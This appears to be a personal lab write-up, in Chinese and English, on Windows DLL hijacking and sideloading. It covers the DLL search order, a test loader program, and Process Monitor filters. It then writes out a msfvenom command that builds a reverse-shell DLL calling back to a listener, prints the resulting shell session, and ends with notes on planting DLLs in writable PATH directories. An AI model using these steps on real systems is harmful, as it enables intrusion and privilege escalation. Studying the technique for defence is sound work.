DLL Hijacking

DLL Hijacking Notes

DLL 搜索路径:

  • 预定义搜索 (安全的)
    • 以加载进入内存中的 DLL
    • Known Dlls
  • 标准搜索顺序
    • 包含可执行文件的目录
    • Windows系统目录,该目录可以通过 GetSystemDirectory得到 (C:\Windows\System32)
    • 16 位的系统目录(C:\Windows\System)
    • Windows 目录,可以通过 GetWindowsDirectory 得到 (C:\Windows)
    • 进程的当前目录
    • PATH 环境变量所列出的目录

DLL Sideloading

empty_dll.dll

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include <Windows.h>


BOOL WINAPI DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Invoke-Dll.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include <Windows.h>
#include <tchar.h>


int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    HMODULE hModule = LoadLibrary(argv[1]);
    if (hModule) {
        wprintf(L"LoadLibrary() OK\n");
        FreeLibrary(hModule);
    }
    else {
        wprintf(L"LoadLibrary() KO - Error: %d\n", GetLastError());
    }
}

Process Monitor Filter:

  • Process Name is Invoke-Dll.exe
  • Path contains empty_dll

PATH

empty_dll.dll 移到标准搜索路径外,可以看到 DLL 的搜索顺序


empty_dll.dll 放入 C:\Windows\

NAME NOT FOUND


检查程序目录是否有写入权:

1
2
3
4
5
6
C:\Users\0x20C>icacls "C:\Users\0x20C\Desktop\dll hijacking"

C:\Users\0x20C\Desktop\dll hijacking 
        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
        DESKTOP-ME4U4MD\0x20C:(I)(OI)(CI)(F)

生成恶意 DLL 替换原 DLL

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f dll -o empty_dll.dll

执行应用程序

1
Invoke-Dll.exe empty_dll.dll

得到 Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.0.106.
Ncat: Connection from 192.168.0.106:50406.
Microsoft Windows [Version 10.0.19041.572]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\0x20C\Desktop\dll hijacking>whoami
whoami
desktop-me4u4md\0x20c

Ghost DLL injection

%PATH% 进行 DLL Injection 的一种技术

PATH

1
2
3
4
5
6
7
8
9
10
11
12
C:\Program Files (x86)\Python38-32\Scripts\
C:\Program Files (x86)\Python38-32\
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files (x86)\IncrediBuild
C:\Users\0x20C\AppData\Local\Microsoft\WindowsApps
C:\Program Files (x86)\Vim\vim82
C:\MinGW\bin
C:\Users\0x20C\AppData\Roaming\Python\Python38\Scripts

挑选一个可写的目录

1
C:\Users\0x20C\AppData\Local\Microsoft\WindowsApps

SUCCESS